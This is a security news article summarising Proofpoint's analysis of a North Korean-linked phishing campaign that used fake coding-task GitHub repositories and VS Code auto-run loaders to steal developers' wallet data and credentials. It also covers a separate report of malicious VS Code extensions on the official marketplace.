North Korean linked hackers are using recruitment-themed phishing emails and malicious GitHub repositories to target nearly 100 organizations across finance, cryptocurrency, education and technology, according to a technical analysis by Proofpoint. The campaign, tracked as UNK_DeadDrop, sent more than 250 emails in six weeks and sought to steal wallet credentials and data from developers on Windows, macOS and Linux.
KEY FACTS
- Targets Nearly 100 organizations were contacted, with most in the U.S.
- Delivery Emails linked to GitHub repositories posed as coding tasks or open-source reviews.
- Payload The malware installed a fake VS Code extension and used Overlord-based loaders.
- Goal The operation aimed to steal credentials and wallet data.
The emails instructed recipients to clone a repository and open it in VS Code or Cursor, which triggered operating system specific loaders. Proofpoint said the infection chain could run without user interaction when a project used the VS Code folderOpen technique.
The Linux and macOS paths led to a custom version of the open-source Overlord framework, while the Windows path used VBScript to launch a CMD file and install the extension. The payloads were built to collect browser wallet extensions, credentials and desktop wallet app data, then send the results to a server.
Researchers said the campaign marked a shift from earlier social engineering on LinkedIn to larger email-based operations. They also said the group had previously used a Windows Go binary of Overlord, but had moved to the new approach, likely to reduce detection.
Separately, Yeeth Security said it found three malicious VS Code extensions on the official marketplace that were disguised as Jupyter Notebook tools and operated as a multi-stage backdoor. The disclosure described SharePoint and Microsoft Graph API channels used for command control and file theft, along with Windows, Linux and macOS components.
WHY IT MATTERS
The findings show that developer workflows remain a useful entry point for attackers seeking credentials and cryptocurrency data. They also suggest North Korean linked groups are broadening delivery methods to scale phishing and make malicious code look like ordinary development tools.